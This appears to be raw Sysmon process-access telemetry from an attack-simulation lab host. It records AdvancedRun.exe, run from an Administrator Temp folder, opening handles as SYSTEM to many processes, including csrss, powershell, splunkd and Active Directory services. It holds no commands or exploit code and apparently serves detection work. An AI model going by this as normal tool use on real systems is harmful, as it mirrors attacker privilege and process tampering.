Data\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080511Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080510Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.468{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080509Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.464{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080484Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.464{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080483Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.464{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080482Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.463{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080481Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.463{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080480Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.463{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080479Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.463{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080478Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080477Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080476Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080475Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080474Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080473Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
